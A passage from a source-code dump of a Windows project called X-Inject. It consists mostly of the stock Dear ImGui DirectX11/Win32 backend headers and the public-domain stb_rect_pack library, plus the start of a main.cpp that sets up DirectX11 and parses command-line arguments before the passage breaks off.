129 |     void MyFunction(const char* name, MyMatrix44* mtx);
130 | }
131 | */
132 | 


--------------------------------------------------------------------------------
/X-Inject/ext/imgui_impl_dx11.h:
--------------------------------------------------------------------------------
 1 | // dear imgui: Renderer Backend for DirectX11
 2 | // This needs to be used along with a Platform Backend (e.g. Win32)
 3 | 
 4 | // Implemented features:
 5 | //  [X] Renderer: User texture binding. Use 'ID3D11ShaderResourceView*' as ImTextureID. Read the FAQ about ImTextureID!
 6 | //  [X] Renderer: Large meshes support (64k+ vertices) with 16-bit indices.
 7 | //  [X] Renderer: Multi-viewport support (multiple windows). Enable with 'io.ConfigFlags |= ImGuiConfigFlags_ViewportsEnable'.
 8 | 
 9 | // You can use unmodified imgui_impl_* files in your project. See examples/ folder for examples of using this.
10 | // Prefer including the entire imgui/ repository into your project (either as a copy or as a submodule), and only build the backends you need.
11 | // Learn about Dear ImGui:
12 | // - FAQ                  https://dearimgui.com/faq
13 | // - Getting Started      https://dearimgui.com/getting-started
14 | // - Documentation        https://dearimgui.com/docs (same as your local docs/ folder).
15 | // - Introduction, links and more at the top of imgui.cpp
16 | 
17 | #pragma once
18 | #include "imgui.h"      // IMGUI_IMPL_API
19 | #ifndef IMGUI_DISABLE
20 | 
21 | struct ID3D11Device;
22 | struct ID3D11DeviceContext;
23 | 
24 | IMGUI_IMPL_API bool     ImGui_ImplDX11_Init(ID3D11Device* device, ID3D11DeviceContext* device_context);
25 | IMGUI_IMPL_API void     ImGui_ImplDX11_Shutdown();
26 | IMGUI_IMPL_API void     ImGui_ImplDX11_NewFrame();
27 | IMGUI_IMPL_API void     ImGui_ImplDX11_RenderDrawData(ImDrawData* draw_data);
28 | 
29 | // Use if you want to reset your rendering device without losing Dear ImGui state.
30 | IMGUI_IMPL_API void     ImGui_ImplDX11_InvalidateDeviceObjects();
31 | IMGUI_IMPL_API bool     ImGui_ImplDX11_CreateDeviceObjects();
32 | 
33 | #endif // #ifndef IMGUI_DISABLE
34 | 


--------------------------------------------------------------------------------
/X-Inject/ext/imgui_impl_win32.h:
--------------------------------------------------------------------------------
 1 | // dear imgui: Platform Backend for Windows (standard windows API for 32-bits AND 64-bits applications)
 2 | // This needs to be used along with a Renderer (e.g. DirectX11, OpenGL3, Vulkan..)
 3 | 
 4 | // Implemented features:
 5 | //  [X] Platform: Clipboard support (for Win32 this is actually part of core dear imgui)
 6 | //  [X] Platform: Mouse support. Can discriminate Mouse/TouchScreen/Pen.
 7 | //  [X] Platform: Keyboard support. Since 1.87 we are using the io.AddKeyEvent() function. Pass ImGuiKey values to all key functions e.g. ImGui::IsKeyPressed(ImGuiKey_Space). [Legacy VK_* values will also be supported unless IMGUI_DISABLE_OBSOLETE_KEYIO is set]
 8 | //  [X] Platform: Gamepad support. Enabled with 'io.ConfigFlags |= ImGuiConfigFlags_NavEnableGamepad'.
 9 | //  [X] Platform: Mouse cursor shape and visibility. Disable with 'io.ConfigFlags |= ImGuiConfigFlags_NoMouseCursorChange'.
10 | //  [X] Platform: Multi-viewport support (multiple windows). Enable with 'io.ConfigFlags |= ImGuiConfigFlags_ViewportsEnable'.
11 | 
12 | // You can use unmodified imgui_impl_* files in your project. See examples/ folder for examples of using this.
13 | // Prefer including the entire imgui/ repository into your project (either as a copy or as a submodule), and only build the backends you need.
14 | // Learn about Dear ImGui:
15 | // - FAQ                  https://dearimgui.com/faq
16 | // - Getting Started      https://dearimgui.com/getting-started
17 | // - Documentation        https://dearimgui.com/docs (same as your local docs/ folder).
18 | // - Introduction, links and more at the top of imgui.cpp
19 | 
20 | #pragma once
21 | #include "imgui.h"      // IMGUI_IMPL_API
22 | #ifndef IMGUI_DISABLE
23 | 
24 | IMGUI_IMPL_API bool     ImGui_ImplWin32_Init(void* hwnd);
25 | IMGUI_IMPL_API bool     ImGui_ImplWin32_InitForOpenGL(void* hwnd);
26 | IMGUI_IMPL_API void     ImGui_ImplWin32_Shutdown();
27 | IMGUI_IMPL_API void     ImGui_ImplWin32_NewFrame();
28 | 
29 | // Win32 message handler your application need to call.
30 | // - Intentionally commented out in a '#if 0' block to avoid dragging dependencies on <windows.h> from this helper.
31 | // - You should COPY the line below into your .cpp code to forward declare the function and then you can call it.
32 | // - Call from your application's message handler. Keep calling your message handler unless this function returns TRUE.
33 | 
34 | #if 0
35 | extern IMGUI_IMPL_API LRESULT ImGui_ImplWin32_WndProcHandler(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam);
36 | #endif
37 | 
38 | // DPI-related helpers (optional)
39 | // - Use to enable DPI awareness without having to create an application manifest.
40 | // - Your own app may already do this via a manifest or explicit calls. This is mostly useful for our examples/ apps.
41 | // - In theory we could call simple functions from Windows SDK such as SetProcessDPIAware(), SetProcessDpiAwareness(), etc.
42 | //   but most of the functions provided by Microsoft require Windows 8.1/10+ SDK at compile time and Windows 8/10+ at runtime,
43 | //   neither we want to require the user to have. So we dynamically select and load those functions to avoid dependencies.
44 | IMGUI_IMPL_API void     ImGui_ImplWin32_EnableDpiAwareness();
45 | IMGUI_IMPL_API float    ImGui_ImplWin32_GetDpiScaleForHwnd(void* hwnd);       // HWND hwnd
46 | IMGUI_IMPL_API float    ImGui_ImplWin32_GetDpiScaleForMonitor(void* monitor); // HMONITOR monitor
47 | 
48 | // Transparency related helpers (optional) [experimental]
49 | // - Use to enable alpha compositing transparency with the desktop.
50 | // - Use together with e.g. clearing your framebuffer with zero-alpha.
51 | IMGUI_IMPL_API void     ImGui_ImplWin32_EnableAlphaCompositing(void* hwnd);   // HWND hwnd
52 | 
53 | #endif // #ifndef IMGUI_DISABLE
54 | 


--------------------------------------------------------------------------------
/X-Inject/ext/imstb_rectpack.h:
--------------------------------------------------------------------------------
  1 | // [DEAR IMGUI]
  2 | // This is a slightly modified version of stb_rect_pack.h 1.01.
  3 | // Grep for [DEAR IMGUI] to find the changes.
  4 | // 
  5 | // stb_rect_pack.h - v1.01 - public domain - rectangle packing
  6 | // Sean Barrett 2014
  7 | //
  8 | // Useful for e.g. packing rectangular textures into an atlas.
  9 | // Does not do rotation.
 10 | //
 11 | // Before #including,
 12 | //
 13 | //    #define STB_RECT_PACK_IMPLEMENTATION
 14 | //
 15 | // in the file that you want to have the implementation.
 16 | //
 17 | // Not necessarily the awesomest packing method, but better than
 18 | // the totally naive one in stb_truetype (which is primarily what
 19 | // this is meant to replace).
 20 | //
 21 | // Has only had a few tests run, may have issues.
 22 | //
 23 | // More docs to come.
 24 | //
 25 | // No memory allocations; uses qsort() and assert() from stdlib.
 26 | // Can override those by defining STBRP_SORT and STBRP_ASSERT.
 27 | //
 28 | // This library currently uses the Skyline Bottom-Left algorithm.
 29 | //
 30 | // Please note: better rectangle packers are welcome! Please
 31 | // implement them to the same API, but with a different init
 32 | // function.
 33 | //
 34 | // Credits
 35 | //
 36 | //  Library
 37 | //    Sean Barrett
 38 | //  Minor features
 39 | //    Martins Mozeiko
 40 | //    github:IntellectualKitty
 41 | //
 42 | //  Bugfixes / warning fixes
 43 | //    Jeremy Jaussaud
 44 | //    Fabian Giesen
 45 | //
 46 | // Version history:
 47 | //
 48 | //     1.01  (2021-07-11)  always use large rect mode, expose STBRP__MAXVAL in public section
 49 | //     1.00  (2019-02-25)  avoid small space waste; gracefully fail too-wide rectangles
 50 | //     0.99  (2019-02-07)  warning fixes
 51 | //     0.11  (2017-03-03)  return packing success/fail result
 52 | //     0.10  (2016-10-25)  remove cast-away-const to avoid warnings
 53 | //     0.09  (2016-08-27)  fix compiler warnings
 54 | //     0.08  (2015-09-13)  really fix bug with empty rects (w=0 or h=0)
 55 | //     0.07  (2015-09-13)  fix bug with empty rects (w=0 or h=0)
 56 | //     0.06  (2015-04-15)  added STBRP_SORT to allow replacing qsort
 57 | //     0.05:  added STBRP_ASSERT to allow replacing assert
 58 | //     0.04:  fixed minor bug in STBRP_LARGE_RECTS support
 59 | //     0.01:  initial release
 60 | //
 61 | // LICENSE
 62 | //
 63 | //   See end of file for license information.
 64 | 
 65 | //////////////////////////////////////////////////////////////////////////////
 66 | //
 67 | //       INCLUDE SECTION
 68 | //
 69 | 
 70 | #ifndef STB_INCLUDE_STB_RECT_PACK_H
 71 | #define STB_INCLUDE_STB_RECT_PACK_H
 72 | 
 73 | #define STB_RECT_PACK_VERSION  1
 74 | 
 75 | #ifdef STBRP_STATIC
 76 | #define STBRP_DEF static
 77 | #else
 78 | #define STBRP_DEF extern
 79 | #endif
 80 | 
 81 | #ifdef __cplusplus
 82 | extern "C" {
 83 | #endif
 84 | 
 85 | typedef struct stbrp_context stbrp_context;
 86 | typedef struct stbrp_node    stbrp_node;
 87 | typedef struct stbrp_rect    stbrp_rect;
 88 | 
 89 | typedef int            stbrp_coord;
 90 | 
 91 | #define STBRP__MAXVAL  0x7fffffff
 92 | // Mostly for internal use, but this is the maximum supported coordinate value.
 93 | 
 94 | STBRP_DEF int stbrp_pack_rects (stbrp_context *context, stbrp_rect *rects, int num_rects);
 95 | // Assign packed locations to rectangles. The rectangles are of type
 96 | // 'stbrp_rect' defined below, stored in the array 'rects', and there
 97 | // are 'num_rects' many of them.
 98 | //
 99 | // Rectangles which are successfully packed have the 'was_packed' flag
100 | // set to a non-zero value and 'x' and 'y' store the minimum location
101 | // on each axis (i.e. bottom-left in cartesian coordinates, top-left
102 | // if you imagine y increasing downwards). Rectangles which do not fit
103 | // have the 'was_packed' flag set to 0.
104 | //
105 | // You should not try to access the 'rects' array from another thread
106 | // while this function is running, as the function temporarily reorders
107 | // the array while it executes.
108 | //
109 | // To pack into another rectangle, you need to call stbrp_init_target
110 | // again. To continue packing into the same rectangle, you can call
111 | // this function again. Calling this multiple times with multiple rect
112 | // arrays will probably produce worse packing results than calling it
113 | // a single time with the full rectangle array, but the option is
114 | // available.
115 | //
116 | // The function returns 1 if all of the rectangles were successfully
117 | // packed and 0 otherwise.
118 | 
119 | struct stbrp_rect
120 | {
121 |    // reserved for your use:
122 |    int            id;
123 | 
124 |    // input:
125 |    stbrp_coord    w, h;
126 | 
127 |    // output:
128 |    stbrp_coord    x, y;
129 |    int            was_packed;  // non-zero if valid packing
130 | 
131 | }; // 16 bytes, nominally
132 | 
133 | 
134 | STBRP_DEF void stbrp_init_target (stbrp_context *context, int width, int height, stbrp_node *nodes, int num_nodes);
135 | // Initialize a rectangle packer to:
136 | //    pack a rectangle that is 'width' by 'height' in dimensions
137 | //    using temporary storage provided by the array 'nodes', which is 'num_nodes' long
138 | //
139 | // You must call this function every time you start packing into a new target.
140 | //
141 | // There is no "shutdown" function. The 'nodes' memory must stay valid for
142 | // the following stbrp_pack_rects() call (or calls), but can be freed after
143 | // the call (or calls) finish.
144 | //
145 | // Note: to guarantee best results, either:
146 | //       1. make sure 'num_nodes' >= 'width'
147 | //   or  2. call stbrp_allow_out_of_mem() defined below with 'allow_out_of_mem = 1'
148 | //
149 | // If you don't do either of the above things, widths will be quantized to multiples
150 | // of small integers to guarantee the algorithm doesn't run out of temporary storage.
151 | //
152 | // If you do #2, then the non-quantized algorithm will be used, but the algorithm
153 | // may run out of temporary storage and be unable to pack some rectangles.
154 | 
155 | STBRP_DEF void stbrp_setup_allow_out_of_mem (stbrp_context *context, int allow_out_of_mem);
156 | // Optionally call this function after init but before doing any packing to
157 | // change the handling of the out-of-temp-memory scenario, described above.
158 | // If you call init again, this will be reset to the default (false).
159 | 
160 | 
161 | STBRP_DEF void stbrp_setup_heuristic (stbrp_context *context, int heuristic);
162 | // Optionally select which packing heuristic the library should use. Different
163 | // heuristics will produce better/worse results for different data sets.
164 | // If you call init again, this will be reset to the default.
165 | 
166 | enum
167 | {
168 |    STBRP_HEURISTIC_Skyline_default=0,
169 |    STBRP_HEURISTIC_Skyline_BL_sortHeight = STBRP_HEURISTIC_Skyline_default,
170 |    STBRP_HEURISTIC_Skyline_BF_sortHeight
171 | };
172 | 
173 | 
174 | //////////////////////////////////////////////////////////////////////////////
175 | //
176 | // the details of the following structures don't matter to you, but they must
177 | // be visible so you can handle the memory allocations for them
178 | 
179 | struct stbrp_node
180 | {
181 |    stbrp_coord  x,y;
182 |    stbrp_node  *next;
183 | };
184 | 
185 | struct stbrp_context
186 | {
187 |    int width;
188 |    int height;
189 |    int align;
190 |    int init_mode;
191 |    int heuristic;
192 |    int num_nodes;
193 |    stbrp_node *active_head;
194 |    stbrp_node *free_head;
195 |    stbrp_node extra[2]; // we allocate two extra nodes so optimal user-node-count is 'width' not 'width+2'
196 | };
197 | 
198 | #ifdef __cplusplus
199 | }
200 | #endif
201 | 
202 | #endif
203 | 
204 | //////////////////////////////////////////////////////////////////////////////
205 | //
206 | //     IMPLEMENTATION SECTION
207 | //
208 | 
209 | #ifdef STB_RECT_PACK_IMPLEMENTATION
210 | #ifndef STBRP_SORT
211 | #include <stdlib.h>
212 | #define STBRP_SORT qsort
213 | #endif
214 | 
215 | #ifndef STBRP_ASSERT
216 | #include <assert.h>
217 | #define STBRP_ASSERT assert
218 | #endif
219 | 
220 | #ifdef _MSC_VER
221 | #define STBRP__NOTUSED(v)  (void)(v)
222 | #define STBRP__CDECL       __cdecl
223 | #else
224 | #define STBRP__NOTUSED(v)  (void)sizeof(v)
225 | #define STBRP__CDECL
226 | #endif
227 | 
228 | enum
229 | {
230 |    STBRP__INIT_skyline = 1
231 | };
232 | 
233 | STBRP_DEF void stbrp_setup_heuristic(stbrp_context *context, int heuristic)
234 | {
235 |    switch (context->init_mode) {
236 |       case STBRP__INIT_skyline:
237 |          STBRP_ASSERT(heuristic == STBRP_HEURISTIC_Skyline_BL_sortHeight || heuristic == STBRP_HEURISTIC_Skyline_BF_sortHeight);
238 |          context->heuristic = heuristic;
239 |          break;
240 |       default:
241 |          STBRP_ASSERT(0);
242 |    }
243 | }
244 | 
245 | STBRP_DEF void stbrp_setup_allow_out_of_mem(stbrp_context *context, int allow_out_of_mem)
246 | {
247 |    if (allow_out_of_mem)
248 |       // if it's ok to run out of memory, then don't bother aligning them;
249 |       // this gives better packing, but may fail due to OOM (even though
250 |       // the rectangles easily fit). @TODO a smarter approach would be to only
251 |       // quantize once we've hit OOM, then we could get rid of this parameter.
252 |       context->align = 1;
253 |    else {
254 |       // if it's not ok to run out of memory, then quantize the widths
255 |       // so that num_nodes is always enough nodes.
256 |       //
257 |       // I.e. num_nodes * align >= width
258 |       //                  align >= width / num_nodes
259 |       //                  align = ceil(width/num_nodes)
260 | 
261 |       context->align = (context->width + context->num_nodes-1) / context->num_nodes;
262 |    }
263 | }
264 | 
265 | STBRP_DEF void stbrp_init_target(stbrp_context *context, int width, int height, stbrp_node *nodes, int num_nodes)
266 | {
267 |    int i;
268 | 
269 |    for (i=0; i < num_nodes-1; ++i)
270 |       nodes[i].next = &nodes[i+1];
271 |    nodes[i].next = NULL;
272 |    context->init_mode = STBRP__INIT_skyline;
273 |    context->heuristic = STBRP_HEURISTIC_Skyline_default;
274 |    context->free_head = &nodes[0];
275 |    context->active_head = &context->extra[0];
276 |    context->width = width;
277 |    context->height = height;
278 |    context->num_nodes = num_nodes;
279 |    stbrp_setup_allow_out_of_mem(context, 0);
280 | 
281 |    // node 0 is the full width, node 1 is the sentinel (lets us not store width explicitly)
282 |    context->extra[0].x = 0;
283 |    context->extra[0].y = 0;
284 |    context->extra[0].next = &context->extra[1];
285 |    context->extra[1].x = (stbrp_coord) width;
286 |    context->extra[1].y = (1<<30);
287 |    context->extra[1].next = NULL;
288 | }
289 | 
290 | // find minimum y position if it starts at x1
291 | static int stbrp__skyline_find_min_y(stbrp_context *c, stbrp_node *first, int x0, int width, int *pwaste)
292 | {
293 |    stbrp_node *node = first;
294 |    int x1 = x0 + width;
295 |    int min_y, visited_width, waste_area;
296 | 
297 |    STBRP__NOTUSED(c);
298 | 
299 |    STBRP_ASSERT(first->x <= x0);
300 | 
301 |    #if 0
302 |    // skip in case we're past the node
303 |    while (node->next->x <= x0)
304 |       ++node;
305 |    #else
306 |    STBRP_ASSERT(node->next->x > x0); // we ended up handling this in the caller for efficiency
307 |    #endif
308 | 
309 |    STBRP_ASSERT(node->x <= x0);
310 | 
311 |    min_y = 0;
312 |    waste_area = 0;
313 |    visited_width = 0;
314 |    while (node->x < x1) {
315 |       if (node->y > min_y) {
316 |          // raise min_y higher.
317 |          // we've accounted for all waste up to min_y,
318 |          // but we'll now add more waste for everything we've visted
319 |          waste_area += visited_width * (node->y - min_y);
320 |          min_y = node->y;
321 |          // the first time through, visited_width might be reduced
322 |          if (node->x < x0)
323 |             visited_width += node->next->x - x0;
324 |          else
325 |             visited_width += node->next->x - node->x;
326 |       } else {
327 |          // add waste area
328 |          int under_width = node->next->x - node->x;
329 |          if (under_width + visited_width > width)
330 |             under_width = width - visited_width;
331 |          waste_area += under_width * (min_y - node->y);
332 |          visited_width += under_width;
333 |       }
334 |       node = node->next;
335 |    }
336 | 
337 |    *pwaste = waste_area;
338 |    return min_y;
339 | }
340 | 
341 | typedef struct
342 | {
343 |    int x,y;
344 |    stbrp_node **prev_link;
345 | } stbrp__findresult;
346 | 
347 | static stbrp__findresult stbrp__skyline_find_best_pos(stbrp_context *c, int width, int height)
348 | {
349 |    int best_waste = (1<<30), best_x, best_y = (1 << 30);
350 |    stbrp__findresult fr;
351 |    stbrp_node **prev, *node, *tail, **best = NULL;
352 | 
353 |    // align to multiple of c->align
354 |    width = (width + c->align - 1);
355 |    width -= width % c->align;
356 |    STBRP_ASSERT(width % c->align == 0);
357 | 
358 |    // if it can't possibly fit, bail immediately
359 |    if (width > c->width || height > c->height) {
360 |       fr.prev_link = NULL;
361 |       fr.x = fr.y = 0;
362 |       return fr;
363 |    }
364 | 
365 |    node = c->active_head;
366 |    prev = &c->active_head;
367 |    while (node->x + width <= c->width) {
368 |       int y,waste;
369 |       y = stbrp__skyline_find_min_y(c, node, node->x, width, &waste);
370 |       if (c->heuristic == STBRP_HEURISTIC_Skyline_BL_sortHeight) { // actually just want to test BL
371 |          // bottom left
372 |          if (y < best_y) {
373 |             best_y = y;
374 |             best = prev;
375 |          }
376 |       } else {
377 |          // best-fit
378 |          if (y + height <= c->height) {
379 |             // can only use it if it first vertically
380 |             if (y < best_y || (y == best_y && waste < best_waste)) {
381 |                best_y = y;
382 |                best_waste = waste;
383 |                best = prev;
384 |             }
385 |          }
386 |       }
387 |       prev = &node->next;
388 |       node = node->next;
389 |    }
390 | 
391 |    best_x = (best == NULL) ? 0 : (*best)->x;
392 | 
393 |    // if doing best-fit (BF), we also have to try aligning right edge to each node position
394 |    //
395 |    // e.g, if fitting
396 |    //
397 |    //     ____________________
398 |    //    |____________________|
399 |    //
400 |    //            into
401 |    //
402 |    //   |                         |
403 |    //   |             ____________|
404 |    //   |____________|
405 |    //
406 |    // then right-aligned reduces waste, but bottom-left BL is always chooses left-aligned
407 |    //
408 |    // This makes BF take about 2x the time
409 | 
410 |    if (c->heuristic == STBRP_HEURISTIC_Skyline_BF_sortHeight) {
411 |       tail = c->active_head;
412 |       node = c->active_head;
413 |       prev = &c->active_head;
414 |       // find first node that's admissible
415 |       while (tail->x < width)
416 |          tail = tail->next;
417 |       while (tail) {
418 |          int xpos = tail->x - width;
419 |          int y,waste;
420 |          STBRP_ASSERT(xpos >= 0);
421 |          // find the left position that matches this
422 |          while (node->next->x <= xpos) {
423 |             prev = &node->next;
424 |             node = node->next;
425 |          }
426 |          STBRP_ASSERT(node->next->x > xpos && node->x <= xpos);
427 |          y = stbrp__skyline_find_min_y(c, node, xpos, width, &waste);
428 |          if (y + height <= c->height) {
429 |             if (y <= best_y) {
430 |                if (y < best_y || waste < best_waste || (waste==best_waste && xpos < best_x)) {
431 |                   best_x = xpos;
432 |                   //STBRP_ASSERT(y <= best_y); [DEAR IMGUI]
433 |                   best_y = y;
434 |                   best_waste = waste;
435 |                   best = prev;
436 |                }
437 |             }
438 |          }
439 |          tail = tail->next;
440 |       }
441 |    }
442 | 
443 |    fr.prev_link = best;
444 |    fr.x = best_x;
445 |    fr.y = best_y;
446 |    return fr;
447 | }
448 | 
449 | static stbrp__findresult stbrp__skyline_pack_rectangle(stbrp_context *context, int width, int height)
450 | {
451 |    // find best position according to heuristic
452 |    stbrp__findresult res = stbrp__skyline_find_best_pos(context, width, height);
453 |    stbrp_node *node, *cur;
454 | 
455 |    // bail if:
456 |    //    1. it failed
457 |    //    2. the best node doesn't fit (we don't always check this)
458 |    //    3. we're out of memory
459 |    if (res.prev_link == NULL || res.y + height > context->height || context->free_head == NULL) {
460 |       res.prev_link = NULL;
461 |       return res;
462 |    }
463 | 
464 |    // on success, create new node
465 |    node = context->free_head;
466 |    node->x = (stbrp_coord) res.x;
467 |    node->y = (stbrp_coord) (res.y + height);
468 | 
469 |    context->free_head = node->next;
470 | 
471 |    // insert the new node into the right starting point, and
472 |    // let 'cur' point to the remaining nodes needing to be
473 |    // stiched back in
474 | 
475 |    cur = *res.prev_link;
476 |    if (cur->x < res.x) {
477 |       // preserve the existing one, so start testing with the next one
478 |       stbrp_node *next = cur->next;
479 |       cur->next = node;
480 |       cur = next;
481 |    } else {
482 |       *res.prev_link = node;
483 |    }
484 | 
485 |    // from here, traverse cur and free the nodes, until we get to one
486 |    // that shouldn't be freed
487 |    while (cur->next && cur->next->x <= res.x + width) {
488 |       stbrp_node *next = cur->next;
489 |       // move the current node to the free list
490 |       cur->next = context->free_head;
491 |       context->free_head = cur;
492 |       cur = next;
493 |    }
494 | 
495 |    // stitch the list back in
496 |    node->next = cur;
497 | 
498 |    if (cur->x < res.x + width)
499 |       cur->x = (stbrp_coord) (res.x + width);
500 | 
501 | #ifdef _DEBUG
502 |    cur = context->active_head;
503 |    while (cur->x < context->width) {
504 |       STBRP_ASSERT(cur->x < cur->next->x);
505 |       cur = cur->next;
506 |    }
507 |    STBRP_ASSERT(cur->next == NULL);
508 | 
509 |    {
510 |       int count=0;
511 |       cur = context->active_head;
512 |       while (cur) {
513 |          cur = cur->next;
514 |          ++count;
515 |       }
516 |       cur = context->free_head;
517 |       while (cur) {
518 |          cur = cur->next;
519 |          ++count;
520 |       }
521 |       STBRP_ASSERT(count == context->num_nodes+2);
522 |    }
523 | #endif
524 | 
525 |    return res;
526 | }
527 | 
528 | static int STBRP__CDECL rect_height_compare(const void *a, const void *b)
529 | {
530 |    const stbrp_rect *p = (const stbrp_rect *) a;
531 |    const stbrp_rect *q = (const stbrp_rect *) b;
532 |    if (p->h > q->h)
533 |       return -1;
534 |    if (p->h < q->h)
535 |       return  1;
536 |    return (p->w > q->w) ? -1 : (p->w < q->w);
537 | }
538 | 
539 | static int STBRP__CDECL rect_original_order(const void *a, const void *b)
540 | {
541 |    const stbrp_rect *p = (const stbrp_rect *) a;
542 |    const stbrp_rect *q = (const stbrp_rect *) b;
543 |    return (p->was_packed < q->was_packed) ? -1 : (p->was_packed > q->was_packed);
544 | }
545 | 
546 | STBRP_DEF int stbrp_pack_rects(stbrp_context *context, stbrp_rect *rects, int num_rects)
547 | {
548 |    int i, all_rects_packed = 1;
549 | 
550 |    // we use the 'was_packed' field internally to allow sorting/unsorting
551 |    for (i=0; i < num_rects; ++i) {
552 |       rects[i].was_packed = i;
553 |    }
554 | 
555 |    // sort according to heuristic
556 |    STBRP_SORT(rects, num_rects, sizeof(rects[0]), rect_height_compare);
557 | 
558 |    for (i=0; i < num_rects; ++i) {
559 |       if (rects[i].w == 0 || rects[i].h == 0) {
560 |          rects[i].x = rects[i].y = 0;  // empty rect needs no space
561 |       } else {
562 |          stbrp__findresult fr = stbrp__skyline_pack_rectangle(context, rects[i].w, rects[i].h);
563 |          if (fr.prev_link) {
564 |             rects[i].x = (stbrp_coord) fr.x;
565 |             rects[i].y = (stbrp_coord) fr.y;
566 |          } else {
567 |             rects[i].x = rects[i].y = STBRP__MAXVAL;
568 |          }
569 |       }
570 |    }
571 | 
572 |    // unsort
573 |    STBRP_SORT(rects, num_rects, sizeof(rects[0]), rect_original_order);
574 | 
575 |    // set was_packed flags and all_rects_packed status
576 |    for (i=0; i < num_rects; ++i) {
577 |       rects[i].was_packed = !(rects[i].x == STBRP__MAXVAL && rects[i].y == STBRP__MAXVAL);
578 |       if (!rects[i].was_packed)
579 |          all_rects_packed = 0;
580 |    }
581 | 
582 |    // return the all_rects_packed status
583 |    return all_rects_packed;
584 | }
585 | #endif
586 | 
587 | /*
588 | ------------------------------------------------------------------------------
589 | This software is available under 2 licenses -- choose whichever you prefer.
590 | ------------------------------------------------------------------------------
591 | ALTERNATIVE A - MIT License
592 | Copyright (c) 2017 Sean Barrett
593 | Permission is hereby granted, free of charge, to any person obtaining a copy of
594 | this software and associated documentation files (the "Software"), to deal in
595 | the Software without restriction, including without limitation the rights to
596 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
597 | of the Software, and to permit persons to whom the Software is furnished to do
598 | so, subject to the following conditions:
599 | The above copyright notice and this permission notice shall be included in all
600 | copies or substantial portions of the Software.
601 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
602 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
603 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
604 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
605 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
606 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
607 | SOFTWARE.
608 | ------------------------------------------------------------------------------
609 | ALTERNATIVE B - Public Domain (www.unlicense.org)
610 | This is free and unencumbered software released into the public domain.
611 | Anyone is free to copy, modify, publish, use, compile, sell, or distribute this
612 | software, either in source code form or as a compiled binary, for any purpose,
613 | commercial or non-commercial, and by any means.
614 | In jurisdictions that recognize copyright laws, the author or authors of this
615 | software dedicate any and all copyright interest in the software to the public
616 | domain. We make this dedication for the benefit of the public at large and to
617 | the detriment of our heirs and successors. We intend this dedication to be an
618 | overt act of relinquishment in perpetuity of all present and future rights to
619 | this software under copyright law.
620 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
621 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
622 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
623 | AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
624 | ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
625 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
626 | ------------------------------------------------------------------------------
627 | */
628 | 


--------------------------------------------------------------------------------
/X-Inject/global.cpp:
--------------------------------------------------------------------------------
1 | #include "global.h"
2 | 
3 | namespace g_status {
4 | 
5 | }


--------------------------------------------------------------------------------
/X-Inject/global.h:
--------------------------------------------------------------------------------
1 | // Our Global State
2 | #pragma once
3 | #include "./ext/imgui.h"
4 | 
5 | //wd: window
6 | namespace g_status {
7 | 	const ImVec4 clear_color = { 1,1,1,1 };
8 | }
9 | 


--------------------------------------------------------------------------------
/X-Inject/imgui.ini:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/imgui.ini


--------------------------------------------------------------------------------
/X-Inject/main.cpp:
--------------------------------------------------------------------------------
  1 | //application for DirectX 11
  2 | 
  3 | #include "global.h"
  4 | #include "app/window.h"
  5 | #include "app/utils/helper.hpp"
  6 | #include "app/utils/theme.hpp"
  7 | 
  8 | #include "./ext/imgui.h"
  9 | #include "./ext/imgui_impl_win32.h"
 10 | #include "./ext/imgui_impl_dx11.h"
 11 | 
 12 | 
 13 | #include <d3d11.h>
 14 | #include <tchar.h>
 15 | #include <windows.h>
 16 | #include <iostream>
 17 | #include <fstream>
 18 | 
 19 | // Data
 20 | static ID3D11Device* g_pd3dDevice = nullptr;
 21 | static ID3D11DeviceContext* g_pd3dDeviceContext = nullptr;
 22 | static IDXGISwapChain* g_pSwapChain = nullptr;
 23 | static bool                     g_SwapChainOccluded = false;
 24 | static UINT                     g_ResizeWidth = 0, g_ResizeHeight = 0;
 25 | static ID3D11RenderTargetView* g_mainRenderTargetView = nullptr;
 26 | 
 27 | // Forward declarations of helper functions
 28 | void GenConfigIniFile();
 29 | bool CreateDeviceD3D(HWND hWnd);
 30 | void CleanupDeviceD3D();
 31 | void CreateRenderTarget();
 32 | void CleanupRenderTarget();
 33 | LRESULT WINAPI WndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam);
 34 | 
 35 | 
 36 | // Main code
 37 | int WINAPI WinMain(HINSTANCE instance, HINSTANCE pInstance, LPSTR lpCmd, int cmdShow)
 38 | {
 39 |     bool needGui = true;
 40 |     std::string commandLine = lpCmd;
 41 |     if (!commandLine.empty())
 42 |         needGui = false;
 43 | 
 44 |     if (!needGui) {
 45 |         std::vector<std::string>words = {};
 46 |         std::string word = "";
 47 |         
 48 |         bool intoRef = false;
 49 |         for (auto c: commandLine) 
 50 |         {
 51 |             if (c == ' ') {
 52 |                 if (!intoRef) {
 53 |                     if (!word.empty()) {
 54 |                         words.push_back(word);
 55 |                         word.clear();
 56 |                     }
 57 |                 }
 58 |                 else {
 59 |                     word.append(1, c);
 60 |                 }
 61 | 
 62 |                 continue;
 63 |             }
 64 |             else if (c == '\n') {
 65 |                 if (!word.empty()) {
 66 |                     words.push_back(word);
 67 |                     word.clear();
 68 |                 }
 69 |                 break;
 70 |             }
 71 |             else if (c == '"') {
 72 |                 intoRef = !intoRef;
